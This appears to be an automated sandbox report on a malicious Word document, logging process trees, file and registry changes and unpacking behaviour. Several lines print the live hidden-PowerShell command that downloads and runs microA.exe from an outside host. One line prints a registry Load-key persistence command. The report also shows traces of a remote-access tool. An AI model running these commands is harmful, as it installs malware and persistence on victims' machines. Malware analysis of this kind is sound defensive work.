Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 16_2_0040D33C
Source: C:\Users\user\AppData\Local\Temp\microA.exe File created: C:\Program Files\Microsoft DN1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$0-MR 311.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCBE6.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................p.......#.........&.......+.....p.........+.......&.....`I(........v.....................K/..................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....`...............................}..v............0................!.............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................ ......6....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j....................................}..v....P.......0................!.............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}..v....`.......0................ ......"....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j....................................}..v............0................!.............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j....@$..............................}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j....................................}..v............0................!.............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j....@$..............................}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j....................................}..v............0................!.............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._.......\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.m.i.c.r.o.A...e.x.e.'.. ......P....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0......._........................7...... .......................}..v............ ................!.............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j....@$..............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j....P...............................}..v............0................!.............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.......w..................j....@$..............................}..v............0.......................f....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w..................j....................................}..v....@.......0................!.............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j....@$..............................}..v............0................ .............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0................!.............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............p.......#.........&.......+.....p.........+.......&.....`I(........v.....................K/......."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............o..j....................................}..v............0................"z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0...............8"z.....6....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../...............o..j....x...............................}..v............0................"z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}..v............0...............8"z....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;...............o..j....................................}..v....@.......0................"z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....G..................j.....%z.............................}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G...............o..j....................................}..v....@.......0................"z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....S..................j.....%z.............................}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S...............o..j....................................}..v....@.......0................"z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._.......\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.m.i.c.r.o.A...e.x.e.'.8"z.....P....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._...............o..j....................................}..v............0................"z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....k..................j.....%z.............................}..v....@.......0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k...............o..j....................................}..v....x.......0................"z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............E.......w..................j.....%z.............................}..v............0.................".....f....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w...............o..j....h...............................}..v............0................"z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j.....%z.............................}..v....x.......0...............8"z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................o..j....0...............................}..v............0................"z............................. Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Console Write: ....................,.'.........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......................
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .[.V.e.r.s.i.o.n. .6...1...7.6.0.1.].........X.......H.................E.....
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ....................................c.r.(.P.....................l...............................6.0.1.].........X.........................E.....
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ....................................c.r.(.P.....................l...............................6.0.1.].................~.................E.....
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ....................................c.r.(.P.....................l...............................6.0.1.].........X.........................E.....
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ..................U.....................(.P.....................l...............................6.0.1.].........X.........................E.....
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ..................U.............C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........................6.0.1.].........X.......(.................E.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\ProgramData\images.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\images.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\images.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\images.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: N40-MR 311.doc Virustotal: Detection: 43%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe 'C:\Users\user\AppData\Roaming\JhwfHBtD..exe'
Source: unknown Process created: C:\Windows\System32\drvinst.exe DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '00000000000005F4' '00000000000005E4'
Source: C:\Users\user\AppData\Roaming\JhwfHBtD..exe Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe C:\Users\user\AppData\Roaming\JhwfHBtD..exe
Source: unknown Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe 'C:\Users\user\AppData\Roaming\JhwfHBtD..exe'
Source: C:\Windows\System32\verclsid.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD2-48AA-11D2-8432-006008C3FBFC}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\images.exe File written: C:\Program Files\Microsoft DN1\rdpwrap.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microA.exe Directory created: C:\Program Files\Microsoft DN1
Source: C:\Users\user\AppData\Local\Temp\images.exe Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\Users\user\AppData\Local\Temp\images.exe Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB* source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: images.exe
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2100227357.0000000001FB0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103552908.0000000002420000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb$ source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: microA[1].exe.0.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.3.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.10.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 10.0.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 10.2.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.11.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.2.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.12.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.2.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: images.exe.16.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.2.microA.exe.cb0000.3.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.microA.exe.cb0000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.microA.exe.cb0000.3.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.microA.exe.cb0000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 18.2.microA.exe.cb0000.3.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Suspicious powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
